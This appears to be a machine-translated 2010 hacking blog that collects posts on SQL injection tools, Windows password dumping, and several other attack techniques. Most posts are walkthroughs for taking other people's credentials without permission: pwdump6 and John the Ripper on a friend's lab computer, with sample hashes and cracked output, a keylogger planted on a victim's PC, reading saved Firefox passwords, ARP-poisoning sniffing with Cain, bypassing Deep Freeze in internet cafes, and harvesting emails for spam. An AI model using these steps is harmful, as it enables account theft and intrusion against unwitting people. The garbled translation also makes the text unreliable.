Hacking

The best scanner SQL injection

2010-08-24T23:56:00.000-07:00

While the adoption of web application for running an online business has enabled companies to connect seamlessly with their customers, it also exposed a number of security problems arising from incorrect code. Vulnerabilities in Web applications that allow hackers to gain direct and public access to sensitive information (eg personal data, login credentials).

Web applications allow visitors to send and retrieve data to / from the database via the Internet. Databases are the heart of most web applications. They store data required for web applications to deliver specific content to visitors and provide information to customers, suppliers and others

SQL Injection is perhaps the web applications-the most common hacking techniques that try to pass SQL commands through a web application for execution by the back-end database. vulnerability is presented when user input is not properly cleaned and thus executed.

Checking for SQL Injection vulnerabilities involves auditing your web applications and the best way to do this is by using automated SQL Injection Scanners. We've compiled a list of free SQL Injection Scanners we believe will be a value to both web application developers and professional security auditors.

SQLIer - SQLIer taking vulnerable URL and attempts to determine all the necessary information to exploit the weaknesses of SQL Injection by itself, does not require user interaction at all. Get SQLIer.

http://bcable.net/project.php?sqlier

SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL injection attacks. Get SQLbftools.

http://www.reversing.org/node/view/11

-SQL Injection Brute Forcer - SQLibf is a tool to detect and exploit the work automatizing SQL Injection vulnerabilities. SQLibf can work in the visible and Blind SQL Injection. It works by doing a simple SQL logic operations to determine the level of exposure of the vulnerable application. Get SQLLibf.

http://www.open-labs.org/sqlibf19beta1.tar.gz

SQLBrute - SQLBrute is a tool to force the crude data from databases using blind SQL injection vulnerabilities. Supports time-based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and does not require non-standard libraries. Get SQLBrute.

http://www.justinclarke.com/security/sqlbrute.py

Bobcat - Bobcat is a tool to assist the auditor in taking full advantage of SQL injection vulnerabilities. This is based on research AppSecInc. This can be a list of related severs, database schema, and allows retrieval of data from the table that the application of the current user has access to. Get Bobcat.

http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html

SqlMap - SqlMap is an automatic blind SQL injection tool, developed in python, capable to perform database management system fingerprint active, enumerate entire remote databases and much more. SqlMap purpose is to implement a database management tool that fully functional system that takes advantage of web application programming security vulnerabilities that lead to SQL injection vulnerabilities. Get SqlMap.

http://sqlmap.sourceforge.net/

Absinthe - absinthe is a GUI-based tool that automates the downloading process and content of the database scheme is vulnerable to Blind SQL Injection. Get absinthe.

http://www.0x90.org/releases/absinthe/download.php

SQL Injection Pen-testing Tool - SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in Web applications. Get SQL Injection Pen-testing tools.

http://sqltool.itdefence.ru/indexeng.html

SQID - SQL Injection digger (SQLID) is a command line program for SQL injections and common errors in websites. This can be done follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.

http://sqid.rubyforge.org/

Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from websites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.

http://www.unsec.net/download/bsqlbf.pl

SQL Power Injection Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It's main strength is its ability to automate tedious blind SQL injection with several threads. Get SQL Power Injection.

http://www.sqlpowerinjector.com/

FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities on web applications. This includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.

http://sourceforge.net/project/showfiles.php?group_id=183841

SQLNinja - SQLNinja is a tool to exploit SQL Injection weakness in a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.

http://sqlninja.sourceforge.net/

Automagic SQL Injector - The Automagic SQL Injector is an automatic SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where the error is returned. Get Automagic SQL Injector.

http://www.indianz.ch/tools/attack/automagic.zip

NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on different database servers to gain access to stored data. Currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.

http://www.indianz.ch/tools/attack/sqlinjector.zip

2010-07-24T08:07:00.000-07:00

Do you ever use a computer in a computer lab or borrow a friend or even use a computer in a public place? Well, usually klo in the Lab (based on personal experience) computer would be if you want to enter a password and should be asked first to the owner. Well, now we can see the password of the computer that we use without restarting the computer or even without installing any program like Cain, L0pthCrack, etc.. It only takes a little 'trust' to borrow a computer (fancy term social engineering) and two fruits of the program, namely pwdump6 and john the ripper. But klo happened to be common with the type of administrator login, that's hockey! cape2 not need a: friend lending login again:-D.
Previously you may never get a tutorial on how to know the user's password to hack an existing Windows XP or NT using pwdump. Yup, maybe this tutorial will be similar to the know-how to hack Windows XP, especially Windows XP SP2. Then what is the difference with the other tutorials? Currently Windows XP SP2 (or maybe SP1, CMIIW), used to protect Syskey to hash (to store encrypted passwords) can not be read and didump use or samdump pwdump. For more details, the following description of the Syskey [1]
Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.
If the first possible in Windows NT or XP (before SP2), we can still use pwdump or even directly with KaHT, then for Windows XP SP2 can not be used this way again (perhaps more accurately, pwdump can not be used again). Well this is the difference with the previous tutorial. If we use our previous pwdump old version, it is now used pwdump6 developed by fizzgig and the foofus.net Team. If you read the README from this pwdump6, then pwdump6 are:
pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.
so pwdumpd6 can run and get the hash files needed an account that has Administrator equivalent access. Now, therefore, we must run a little social engineering. Just say to our friend, klo access the workgroup, but can klo ga pake ordinary login. But calm, usually by default the people most mebuat user with administrator account type. Or use a variety of ways, resources, effort and persuasion so that we can be able to log in first.

If you already have access to the login type of administrators, the next way is to stay running pwdump6. If you have a flash, save it and take it wherever there continues pwdump6 go, who knows handy someday .. :-D. Ok, we run pwdump6 immediately wrote this. We recommend that you first copy to the hard disk pwdump6 (do not run from flashdik).
1. CMD Run (Run-> cmd)

2. Run pwdump6 as follows (eg PwDump6 located in the folder D: \ PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.
3. After that we will get pass.txt file containing a list of user and password are still encrypted. An example would look like the following:
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::
4. OK! password already in hands. The next task is pulled pass.txt crack file with the help of John The Ripper. We recommend that you first save the file to a USB pass.txt or upload them to a safe place, because this cracking process can be done anytime and anywhere. Based on experience, if not too difficult to guess password such as "adminkeren", "qwerty123", which does not usually take too long to mengecracknya by John The Ripper. But if the password using a combination of strange things like "P4ssW0rD", "S03S4h", etc., usually take longer, be left to sleep or maen aja first. Ok, now how ngecraknya gini nih.

Download John The Ripper for Windows. For computers that use AMD processor, we recommend using a "john-mmx.exe". Or for that use Intel or AMD, can use the "John-386.exe". Previously pass.txt copy files into the folder where the "John-mmx.exe" or "John-386.exe" is (John171w \ john1701 \ run). After that, run the following command to stay and wait patiently for:
D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (Try:2)
ADMINKE (Administrator:1)
MUDAHDI (Try:1)
OK! password is now invisible visible. So the password for user "Administrator" is "adminkeren123", derived from combining Administrators: 2 and Administrators: 2

Administrator:1+Administrator:2 = adminkeren123
while for the user "try" is "predictable"!

Easy is not it? The point still live capture file hash (password encrypted) using pwdump6 then crack the result with John The Ripper.

Now, if we want to use computers in the Lab friends, his people do not have to search again. Stay pake aja Admin user directly again, but do not get caught with him ... .. :-D Or if you forget the administrator password, do not need to reboot the computer, then reset your password. Staying involved STEP 2 above ONLY!

(Deep UnFreezer)

2010-07-24T07:41:00.000-07:00

Create your cybercafe operators and the users who use Deepfreeze to protect and counteract the configuration changes on your PC from viruses and users are ignorant of, so from now on be careful because of Deepfreeze on your PC can be paralyzing and password used to unlock deepfreeze will not more useful with this Unfreezer Deep?
Deep UnFreezer is a tool that allows you to change the status of Deep Freeze without needing a password or in other words paralyze Deepfreeze.
Using Deep Unfreezer very quick and easy, you simply just pay attention to the position of the radio buttons to select a running process, and ending with the save status> Exit> Restart / shutdown the PC. So change will happen after the restart / shutdown.

Follow the step below (see picture above) as a guide to use Deep Unfreezer:

Deep Unfreezer 1.Ketika run, make sure Deep Freeze detected / detected on the columns of the log, click the button to check the status of load status of Deep Freeze.
2.Apabila terdeksi the Deep Freeze does not automatically, then the user / files you have to find a position in the Deep Freeze.
3.Fungsi from the selection process of radio buttons:
A. Boot Froozen: a process that will enable Deepfreeze when the status of Deep Freeze thawed / Off.
B. Thawed on next boot: The process to disable / thawed Deep freeze over and counted (line number that is set up) to do restart. For example we set the number 2, then the non-active Deep freeze will be done two times during the restart and on restart the three automatic switches (Frozen).
C. Thawed Boot: The process to disable Deep Freeze, when the status of active Deepfreeze / Frozen.
4. Status last click the Save button> Exit> Restart / Shutdown your PC.

1001 HOW TO GET RIGHT / ADMINISTRATOR PASSWORD

2010-07-24T07:38:00.000-07:00

Hi all, here I share a variety of (hopefully until
1001 ways) to get administrator rights in Windows
(Especially Win Xp) includes various software.
When you try on your own computer make sure backup your hard drive. Sincerely for all members who
more tau. Those who want to share / discussion too please

1. Want to know the username and password only:
a. Click on START and select RUN and type in CMD and hold ENTER
(Go to command promt) and type
"Net user" (without quotation marks)
username appearing there.

2. Hack windows administrator account
(Note: not all systems are windows there)

a. Sign In as guest / limited account
b. Click START, RUN and type REGEDIT and ENTER
c. Open this directory:
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows
NT \ CurrentVersion \ Winlogon]
d. Search "" AutoAdminLogon. ", Right click and select
Modify and change the Value Data to "1"
e. Exit and restart, immediately deh / automatic login to
administrator.

3. Change Account Password without OLD PASSWORD
a. Click on START and select RUN and type in CMD and hold ENTER
(Go to command promt) and type
net users administrator * (typed with signs
stars) or if its already know the username type:
net users "Pigs" * (The pig is the instance name of the username)
b. Continue to have questions for the new password, type deh
and confirm the new password again. After
the new password that you use for login.

4. Auto Configuration - Logon
a. Click START / RUN / type "control userpasswords2"
(Without the quotation marks)
b. Unchek (remove the check in writing) 'User must
Enter a user name and password to use this computer "
Choose one of the existing username and click OK
(The function each time you log directly into
administrator or the username is selected)
c. Want more, the option "password for
administrator "select Gaza" RESET PASSWORD "change tuh
according to your wishes.

5. Want to know more to hacking win xp, download
Here:
http://file2upload.com/file/16116/O-Reilly---Windows-
XP-Hacks-chm.html

6. Active Password Changer is a solution-based DOS
Designed for resetting local user passwords in case
of the administrator's password is Forgotten or lost.
Forgotten password recovery software is useful if you
lost the administrator password and Can not access the
system operation. Other Windows login security
restrictions like 'Account is disabled', 'Password
never expires ',' Account is locked out ',' User Must
Change Password at Next Logon 'and' Logon Hours' cans
changed or reset. Supported platforms: Windows XP,
2000, NT, Windows Server 2003 and Windows Vista.
Active Password Changer Professional version now
contains Windows application and Active @ Boot Disk
Lite - Windows Vista based bootable CD / DVD ISO image.

Download: 2.80 MB

http://www.duniasex.com/anonym/?http://rap...hangePro3.5.rar

Mirrors

http://www.duniasex.com/anonym/?http://www...hangePro3.5.rar

Pass: www.dl4all.com

7. Password software Windows Key (recomended)
Download here:

http://www.sendspace.com/file/eno4g6
(Name: Passware Windows Key Enterprise Edition v7.9.2141.rar
Size: 10MB
Description: Windows Password Recovery)

good luck

THIS IS THE APPLICATION FOR FACEBOOK ACCOUNT freeze OTHERS

2010-05-28T02:01:00.000-07:00

Ever thought not to delete a facebook account of your friend, or even delete your own facebook account. Well, here's a tutorial that is appropriate for you. But, should not be used for crime well. . .
Actually, this application has been known by several facebookers us, but for the friends who have not been able INFO, please continue reading.

These applications are called facebook Freezer, its use is quite simple but the effect is quite dangerous!
Applies to a very simple way. Simply enter the email address of the victim. Click Freeze, then wait until the process is 100%.
To download please googling himself well. .. hehehe
Update: who want to try and not be bothered googling please download

Deepfreeze v 6.xx How to collapse in a computer cafe (preparation hack facebook password)

2010-05-28T01:54:00.000-07:00

Previously I had a post about how to hack facebook poker chips keylogger method. Will be a problem for my friends if it finds a computer that is installed deepfreeze v 6 and above. If deepfreeze v5 broken down was easy, right?
DeepFreeze is compatible in pairs in the cafe so that the virus is not stored and lost during the restart. This also becomes a problem when installing any program installed diwarnet deepfreeze. Keylogger is no exception. Because the program will not be saved when the computer is restarted.
Luckily we have friends who want to share experiences Ucoon.co.cc "DeepFreeze hacker cafe" in its web. Copas well here's how I let my friends, agan-agan, kk2, ad2, all assigned to this information. Do not think aya taught hack loh. I just give us the info, dipake least this way depends indivdunya, Bener not? The following excerpts:
Prepare the first of at least 1 GB Flash Disk, used as the initial boot media when the company switched.
Making a Linux live USB.
Install DeepFreeze V.6 on another computer, then set DeepFreezenya be thawed Boot and restart the computer.
Copy the file $ persi0.sys located in C: \ to the Flash Disk that has been created for the Linux live USB.
Naah .. Skr we can begin to act only with Flash Disk 1 GB ...
Remember do not do that damage the interests of people hal2!.
Turn on the target computer and do not forget to set the first boot from a USB biosnya n wait until it finishes loading the Linux live Usbnya (yesterday I was wearing backtrak 3 if you do not have a download only).
After that, search the storage media file system Linux Windows with Windows Explorer and locate the file $ persi0.sys, if was able to delete or move the location of the file.
Copy the file $ persi0.sys that has been copied to the Flash Disk into location $ persi0.sys previously (klo diwindows "C: \ $ persi0.sys").
Now restart the computer and re-prioritized normalkan bootnya from a disk.
Now prepare DeepFreeze V.6 and double-click, then the window will pop up and do the uninstall deepfreeze uninstall process until selesei.
DeepFreeze Shit ...

How To Get Tens of Thousands Email

2010-05-18T04:05:00.000-07:00

A. Use the software Mailcrawl (notworksolution.com) Version 3000 free version can store all the email search, grub should be able to save up to 15 000 emails / keyword.

How to use:
1. In the quick start wizard click the target using keyword searching and then enter a unique Indonesia
(Family, money, women, success, agriculture, military)
2. Option:
a. select 60-80 thread
b. parsing email: click only extract emails with These extensions / domain and content. com. net. en c. These email with the username ignore the contents of the list of words below: (copy only)
abuse info privacy notice Consult sales support nospam spam bugtraq Listserv subscribe unsubscribe
reply majordomo daemon bounce mail domain name news www xxx 20 3d files play webadmin webmaster
admin postmaster hostmaster owner promaster manajerhosting tuanweb webhosting billing register list
cs feedback comments customercare customerservice manager username yourname name Yourname
cs prohosting technical support service technical support request info zzz joint stop

members of the index menu help file article d. automatic saving select number 1000 e. Start --- name the folder where to store the results in accordance with a keyword f. If the number of valid e-mail has not reached 1.000, while the search panel have a deadline approaching,
do stop then add new keywords without having to reset again. We suggest the folder name
keywords combined storage
g. If the number of invalid email has approached the 3000 figures while the search panel is still far from the boundary
end. Do stop and then start then give the new folder name search results, you should KEYWORD1,
KEYWORD2 ff.

3. If you already have been collected by many keywords, there must be a multiple emails.
To obtain single-use email list software Listawy (mewsoft.com). This software can in addition
merge, email removal also mensplit all emails according to the number of files or the number of emails / per file

Knowing Tips email accounts and passwords stored in Firefox browser

2010-05-18T03:40:00.000-07:00

hallo guys...

This time edji want to discuss tips to know others username and password stored in Firefox browser. Why should firefox? because firefox is a browser's most popular and most used. This mode is very useful if the target we have a company or personal laptop because in general the kit store (Remember) the password in the browser for reasons of convenience.

* At the victim's computer, open mozilla
* Select the Tools menu> Options
* In the Options window click the Security tab

# Click the Saved Password
# If the victim never save (remember) password and username in firefox it will show here.

Click the Show Password to see the password.
Okay, you already know the username and password for your friend. Not only facebook is not it? You can even find all the usernames and passwords are never stored in the firefox browser, such as email accounts and so forth.
Once again, science is just for a newbie like edji gan this. Sorry my friends that I've stolen his password. Sorry yah. Create temen-temen me, next time yah pake master password.

Create-agan agan a senior already, yah ... please shared their knowledge do not just protest blogs of others. Emang Well this blog is far from complete, but edji always try to give my best. Dimnfaatkan with both his knowledge well. Do not be using that to steal passwords loe own best friend. Never sob ..

Password breaker software v6 100% working Deepfreeze

2010-05-18T03:33:00.000-07:00

Afternoon poker mania ... Previously ay ever post about how to hack deepfreeze v6 in a computer cafe. That way I think is still too complicated to try. Well, for those not bothered now already have the software create deepfreeze hacker v6. His name is Anti Deepfreeze. Actually edji have long wanted this post, but because of busy college so delayed ...
This software can collapse deepfreeze v4 standard, the standard v5, v6 and v6 standard evaluation. One of the advantages of this software other than software that is not detected by antivirus trojan therefore safe to use in action

Fairly easy way of remaining life.

* Press the Shift key while jamming click the icon deepfreeze.
* It would appear that installed deepfreeze version
*In this case I find a deep freeze v6 Standard Evaluation.
* Run anti deepfreezenya select the software version deepfreezenya, then click Apply.

* After that, you just change the password ... OK deh ....

Create a edji not like to blog ... please forgive ... edji just trying to help in any way aku.edji not tell you that I was the master and all posts edji quality ... sorry

Looking at the Computer Serial Number?

2010-05-12T04:36:00.000-07:00

To see the serial number and serial number on a computer search can be done quickly using the tools named Keyfinder.
These tools can be downloaded for free at the site creators in www.magicaljellybean.com / keyfinder. Keyfinder can be used in OS Windows 95, 98, ME, 2000, XP, danWin7.
This program is free, the total has reached 7,095,439 unduhannya last author visited on 05/06/2010.
The features of this Keyfinder as follows:
Features:
Open Source - This Means That Can it be trusted. The Keyfinder does not contain trojans or "phone home" messages. No spam, spyware, viruses, trojans or.
An optional config file - this functionality lets you pull a key stored in the registry for any software
Command line options - / save / savecsv / close / hive / file
Load Hive option - allows you to load the registry hive of another Windows installation. To use, put the hard drive in a working machine (Also must be Windows 2000, XP or Vista) or use Windows PE (not tested, Should work) and click Load Hive. Then point it to the dead Windows install. If you're using Windows Vista, Administrator rights are required for this feature. May you have to Right click on the Keyfinder and run as Administrator.
Improved Save & Print! - Save & print options will from now include all keys. Save Is Also available in text or CSV.

Passive Footprinting

2010-05-12T04:29:00.000-07:00

Passive footprinting is the initial information gathering process does not involve the victim but the victim directly. What are the benefits that can hackers get through passive footprinting?
In Passive footprinting hackers can obtain information about the victims, namely:

1. To find out company information
2. IP address of the company
3. Domain name registration company information

And of the three points above there was more beneficial than passive footprinting some powerful weapons to find and reveal the identity of a hacker, but we will not be discussed here but in the next article we will discuss.
And the three points above we'll discuss it one on one. This tutorial is to add insight only if there are errors in the content of this post. Please in the correction
1. To find information peruhaan
In this section, hackers will find information relating to companies ranging from corporate web site addresses, employee information, contact email and phone contact firm, host location and ISP used, and data relating to other companies.
How do hackers get all that information?
1.1. For website addresses
Hackers can use google to search for the company's name and usually the company is using the meta description and meta keywords on the company and its services or the services provided and this is not a difficult thing to do.
1.2. Employee Information
Some companies generally to facilitate the client in terms of support services display a list of names of staff and the type of work. In this section hackers collect personal data of employees to perform social engineering action.
.3. Contact E-mail and telephone
To contact e-mail and telephone from the company can be found on the page or contact us about us on the web page of the company.
1.4. Host location and ISP used
Why is this necessary? This is in needing to find information on the network range used, the ports are open and to know the travel route data packets to the victim's computer clicks. read here for more details
2. IP address of the company
What are the benefits of knowing the IP address of the company? There are so many things that can be known from the IP address from a server location, the ISP used, and information control of the company.
2.1. Location server
To find the location of the server we only need an IP Address alone. How? Open this address in your browser and enter the IP address or Hostnya Address.
2.2 Internet Service Provider used
To find an ISP that used on the site you can menceknya www.wxtips.com / tools / info on the IP data will be visible from neighboring Networking server.
Domain Name Information Server 2.3
Control can be obtained when we had a whois domain name, can use centralops.net, wxtips.com or domain if Indonesia could use pandu.or.id.
3. Domain Name Information
Some companies use a domain protect the Domain Name to protect his company. Why? Clearly, to protect against domain theft or hijacking of the domain. How? Hackers will see the domains that will expire domainsbot.com active period can pass, or other whois sites and if you forgot to extend the domain owner domain, the domain will be changing hands. Beside that, the hacker can also masquerade as a company where you bought the domain and ask my neighbor data domain name such as EEP code and others. Then how do I protect working domain?

Wordpress Hack – How to Get Simple Tags Plugin Working with Wordpress 2.9!

2010-05-07T09:26:00.000-07:00

For those of you who are getting errors with Simple Tags plugin when upgrading to Wordpress 2.9, there’s a simple hack to make it work:

Edit the file simple-tags.php and change the following from this:

if ( strpos($wp_version, ‘2.7′) !== false || strpos($wp_version, ‘2.8′) !== false )

to this:

if ( strpos($wp_version, ‘2.7′) !== false || strpos($wp_version, ‘2.8′) !== false || strpos($wp_version, ‘2.9′) !== false )

I guess it’s because the version numbers were hard-coded, not because the plug-in isn’t compatible with 2.9.

How to Ping Your Website Worldwide!

2010-05-07T09:03:00.001-07:00

Just Ping is a service that will ping your website from various different locations in the world. If you want to optimize your site and also wonder how fast it would load in other parts of the world, you can use Just Ping to do just that.

Another great feature is that you can also check the IP address being reported by various different points in the world. What this does is helps you check DNS delegation status of your website during a DNS move.

Check Your Website For DNS Delegation!

2010-05-07T08:56:00.000-07:00

When you change your DNS records, your DNS delegation will usually take more than 12-24 hours on average. This means that during that time, it might be impossible to check your website.
This can be a big problem if you are moving a website to a new server and you can’t check if you’ve moved everything right.
So, how do you check your website on the new server during DNS delegation?
You can easily do this by changing the DNS servers on your computer.
For Windows, you can go into your network adaptor settings, then right-click on your adaptor, then select “Properties”.

You will see a bunch of options like the above screen shot. Simply double-click on “Internet Protocol Version 4 (TCP/IPv4). This screenshot was from Windows 7 and on other Windows, I think it’s simply called “TCP/IP”.

Here, you can set your DNS server to your new web server’s IP address. In this example, I set it to “47.23.55.24″.

Click okay and try navigating to your URL such as mydomain.com. Now you should be able to see your website on your browser and make sure your website has been moved successfully before DNS delegation is finished.

Also, any images not from your own domain name (URL) will not load on your browser. This is because you can only load elements from your domain name as your DNS is set to your new web server.

Now, this might not work if you are on shared server or it could, it depends on your hosting provider. For dedicated servers, VPS, or hosting servers with your own unique IP address, it should work flawlessly.

Make sure you go through the above process and set your DNS back to “Obtain DNS server address automatically” when you are done testing your new server.

That is one of the ways of doin’ it but there’s also a better way if you want to be able to access the whole internet.

You can edit the hosts file under C:\windows\system32\drivers\etc\hosts. Simply edit the file with a notepad program and add the following line at the end of the file:

47.23.55.24 mydomain.com

where 47.23.55.24 is the IP of your new server and mydomain.com is the domain name of your website.

Now save the file and try loading your site on the browser, it will load from your new server.

One more thing, you can also check the IP address of your website (to make sure it’s coming from the new server) by going to command prompt (type cmd under Start->Search programs and files) then typing ping mydomain.com.

By being able to check that everything is working correctly on your new server, you will lose ZERO traffic during DNS delegation because your website will load flawlessly whether on the old server or the new server.

How cool is that?

Well, for those of you who didn’t know, now you know! Make sure to subscribe for more great free tips on hacking your web server!

Tips to Avoid Hacking Blog

2010-04-29T08:49:00.000-07:00

Not infrequently a webmaster or blogger to feel worried in the hack, especially with the more popular a website, will be more often exposed and have the threat of hacking. To avoid this danger, here are some tips to secure your wordpress installation from hack attacks.
Secure Database
The first suggestion which I recommend is a secure database of your website or blog. The trick, make frequent backups of the database and frequent backups of data. You can do this via phpMyAdmin in the hosting account, or using plugins, like WP-Database Backup (http://wordpress.org/extend/plugins/wp-db-backup/). These plugins perform backup tasks easier. You only need to log into the WordPress admin panel and click a few links. These plugins should be owned by every blogger.

Scan WordPress
After having a plugin that protect a database website, the next step is to scan to make sure the WordPress installation was not detected on the security gap. This task can be performed also by using a plugin called WP Security Scan (http://wordpress.org/extend/plugins/wp-security-scan/). With this plugin you can mengedintifikasi gap - if the security hole was found in the blog. In addition we will be told how to fix it.
WP Security Scan plugins will also be offered for the change of name prefixes tables, testing the strength of passwords, delete the admin account and verify your blog directory to have good security.

The intruder deterrent
The intruder in this sense is a combination of letters, numbers and so forth trying to find the password. Even the biased Python script used to try to find the password you WordPress blog.
It would be very easy for an intruder to find the password if you use a blog name or word that is predictable. Therefore, try using the correct password - really strong, using a combination of lowercase letters, numbers and special characters. You also take advantage of the bias generator in the WP Security Scan password to create a strong password.
Although using a password that is juat a good trick, another way that will provide efficient protection for your blog, by adding the Apache Login form to the WP-Admin directory. Ask Apache (WP Security Scan) plugin allows you to protect your wp-admin directory its security level equivalent to the authentication server (htpasswd). This plugin allows you to disable hotlinking, or prevent direct access to the wp-content directory and wp-includes.

Observe Plugins
Not all plugins were good, some of them which is the eye - the eye to know the vulnerabilities inherent in your blog. For this reason, there is a need for you to hide the content directory / wp-content/plugins. The trick is to create an empty file named index.html, which is then uploaded into the directory wp-content/plugins

WordPress version Hide
If there is one security hole in certain versions of WP, a hacker only needs to display the source code of your blog on your browser and see if the version you are wearing a bias related to penetrate. By leaving the version of Meta, the bias is likely infiltrated your blog. To prevent this, delete the line in header.php in the theme you use.
Similarly, there is also a plugin that allows you to trick on the version of WordPress you are wearing.

Tips Hacking Facebook with Keylogger ?

2010-04-29T07:48:00.000-07:00

How to Use Perfect Keylogger Hacking Facebook! already in the know Is Keylogger? who do not know read my previous post:
What is a Keylogger?

Articles like this has a lot to make, but even more that nyari, so I better make this article also unique by using the keyword "Using Facebook Hacking Tips Perfect keylogger" eventually becomes too! lha how else, it is very difficult for a hacker now, Facebook has gained an improved security system. Script2 not able to penetrate the defense facebook

keylogger software is used for espionage activities against computer users. It also can make the password for facebook users know what the computer. How to Use Perfect Keylogger Hacking Facebook is to install keylogger software on computers that will become our spy.

There are many types of keylogger software that we use is a keylogger old version, but no significant problems that can view facebook password.
How to Hack Facebook Nge Using keylogger:

- Download Perfect Keylogger Perfect Keylogger Please Download (search on google just yaa)
hehehe. at 4shared too much.
- If finished Download Perfect Keylogger WinRAR files first extract

How to install:
- Install the victim computer
- Double-click the file bpk.exe

Perfect Keylogger keyloggerPerfect

- We use the trial version click Continue evaluation aja, if you want the full version please click on the Enter button and enter the registration code serial number that is included in the package.
- After completing the installation icon appears in the lower right corner of the computer Perfect Keylogger Double-click the taskbar to bring it, otherwise right click and hide to hide the icons.
- Perfect Keylogger is a view like this, every password typed letters and applications used will be stored in box display.

Perfect Keylogger Hacking Facebook: keystrokes viewer

- Now try to close the first application Perfect Keylogger, log into your Facebook.
- Double-click the taskbar icon bottom right corner of the Perfect Keylogger computer.
- See your Password caught on the display box.
and happy hacking

Note: All things about using this software becomes your responsibility.
because this crime row

Knowing Tips email accounts and passwords stored in Firefox browser

2010-04-07T21:32:00.000-07:00

Previously I had a post about how to steal usernames and passwords of others facebook fake login method, this method only works if the victim is trapped to make fake login to our login.
This time aya want to discuss tips to know others username and password stored in Firefox browser. Why should firefox? because firefox is a browser's most popular and most widely used. This method is very useful if the target we have a company or personal laptop because in general we save (Remember) the password in the browser for reasons of convenience.
in the victim's computer, open mozilla
Select the Tools menu> Options
In the Options window click the Security tab

Click the Saved Password
If the victim never save (remember) password and username in firefox it will show here.

Click the Show Password to see the password.

Okay, you already know the username and password for your friend. Not only facebook is not it? You can even find all the usernames and passwords are never stored in the firefox browser, such as email accounts and so forth.
Once again, science is just for a newbie like aya gan this. Sorry my friends that I've stolen his password. Yah sorry. Create temen-temen me, next time yah pake master password.

Create-agan agan a senior already, yah ... please shared their knowledge do not just protest blogs of others. Emang Well this blog is far from complete, but I always try to give my best. Dimnfaatin with both his knowledge well. Do not be using that to steal passwords loe own best friend. Do not ever bro ..

Learning Becoming Hacker

2010-04-07T21:14:00.000-07:00

Hackers with expertise can view & fix weaknesses in the computer software; normally then published openly on the Internet for the system to become better. Unfortunately, few people take evil for evil use that information - they are usually called crackers. Basically the world of hackers and crackers are no different from the art world, here we are talking art Internet network security.
before you need to know your IP address used >in command prompt (cmd).

after that, the program Cain, click start APR and start sniffer such as in the following figure.

After that click snifing tab and then right click and select scan the MAC Address, view pictures:

Click the ARP tab at the bottom, then click the plus sign "+" to add, it will exit the dialog box as shown below.

On the left box click on an IP server and right-click on the box IP the victim. Do it repeatedly to nge-hack all victims of an existing IP address.
Once completed, the process will be conducted on all IP poisoning victims.

For results, please click the password tab on the bottom and click on HTTP, see the picture,

Reading Results:

* Click Menu HTTP On the left sidebar.
* Note Column Client, make sure it's not your own IP address.
* Watch your Username and Password fields. Often we come across data that is not the password, you will mendampatkan password if the target login.

Thank you my friends who commented and corrected this post.

How to Block Unwanted Emails

2010-03-30T04:21:00.001-07:00

Do you want to block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.

For Gmail

1. Login to your account

2. At the top-right corner, click on Settings

3. Under Settings, click on Filters

4. You’ll now see an option “Create a new filter“, click on it

5. Now in the From field enter the email address from which you do not want to receive the emails

For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.

